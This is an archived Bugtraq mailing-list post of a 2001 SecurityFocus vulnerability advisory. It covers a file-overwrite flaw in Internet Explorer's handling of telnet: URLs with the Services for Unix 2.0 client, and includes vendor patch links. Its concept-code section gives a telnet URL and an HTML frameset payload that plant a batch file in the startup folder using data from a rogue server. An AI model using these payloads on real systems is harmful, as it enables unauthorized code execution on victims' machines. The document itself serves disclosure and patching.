Bugtraq mailing list archives
Internet Explorer and Services for Unix 2.0 Telnet Client
From: Oliver Friedrichs <of () SECURITYFOCUS COM>
Date: Tue, 13 Mar 2001 16:00:54 -0800
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SecurityFocus.com http://www.securityfocus.com Vulnerability Report For Internet Explorer and Services for Unix 2.0 Telnet Client Date Published: 13 March 2001 Advisory ID: n/a Bugtraq ID: 2463 CVE CAN: None currently assigned. Title: Services for Unix 2.0 Telnet Client File Overwrite Vulnerability Class: Input Validation Error Remotely Exploitable: Yes Locally Exploitable: Yes Vulnerability Description: ========================= A vulnerability has been discovered in the interaction between Internet Explorer and the Telnet client installed with Services for Unix 2.0, that allows arbitrary files to be overwritten, or created, containing attacker specified data. This vulnerability occurs as a result of Internet Explorer executing the "telnet" command and passing command line parameters, specified in the URL, to the telnet program. The Windows 2000 Telnet client contains a client side logging option, which is used to log all telnet session data to a file specified by this option. By specifying the "-f" flag to the telnet command, accompanied by a filename, all session text is logged to this file. Vulnerable Packages/Systems: =========================== All versions of Internet Explorer with Services for Unix 2.0 installed are presumed to be vulnerable to this problem. Solution/Vendor Information/Workaround: Microsoft has released an update which solves this problem. The update, and more information can be obtained at the following locations: http://www.microsoft.com/technet/security/bulletin/MS01-015.asp http://www.microsoft.com/windows/ie/download/critical/q286043/default. asp Updates are available for Internet Explorer 5.01 Service Pack 1 and Internet Explorer 5.5 Service Pack 1. Vendor notified on: ================== November 1, 2000 Credits: ======= This vulnerability was discovered by Oliver Friedrichs <of () securityfocus com>. This advisory was drafted with the help of the SecurityFocus.com Vulnerability Help Team. For more information or assistance drafting advisories please mail vulnhelp () securityfocus com. Technical Description - Exploit/Concept Code: ============================================ This vulnerability can be reproduced by giving Internet Explorer a URL such as the following: telnet:-f%20\file.txt%20host The above example will cause Internet Explorer to invoke the telnet client and cause it to connect to the host "host", logging all output to the file "\file.txt". An attacker can cause arbitrary data to be written to this file by setting up a rogue server, such as netcat, which is listening on the telnet port, sending their desired data to the client. Arbitrary port numbers can also be specified on the telnet command line, so the server need not listen on port 23. Furthermore, the invocation of the telnet client can be hidden within existing HTML, automating it's execution. This vulnerability can also be exploited via Outlook, which by default will automatically process HTML messages. <html> <frameset rows="100%,*"> <frame src=about:blank> <frame src=telnet:-f%20\Documents%20and%Settings\All%20Users \start%20menu\programs\startup\start.bat%20host%208000> </frameset> </html> The above example will cause data that is received from port 8000 on the host "host" to be written to the file "boom.bat" in the startup directory for all users. Assuming the logged in user has the appropriate permissions, this will create a batch file that is executed upon any future user logon. Note that if the username is known to the attacker, this can also be directed towards the logged in user, who will have permission to create this file. DISCLAIMER: The contents of this advisory are copyright (c) 2000 SecurityFocus.com and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.3 for non-commercial use <http://www.pgp.com> iQA/AwUBOq6xlcm4FXxxREdXEQI+8wCfcnxnmIR8nDqOgqlGFxa5nbQldUcAoLW6 uW9Hz+AFB3j7rcJga+DGqUlu =qvCI -----END PGP SIGNATURE-----
Current thread:
- Internet Explorer and Services for Unix 2.0 Telnet Client Oliver Friedrichs (Mar 13)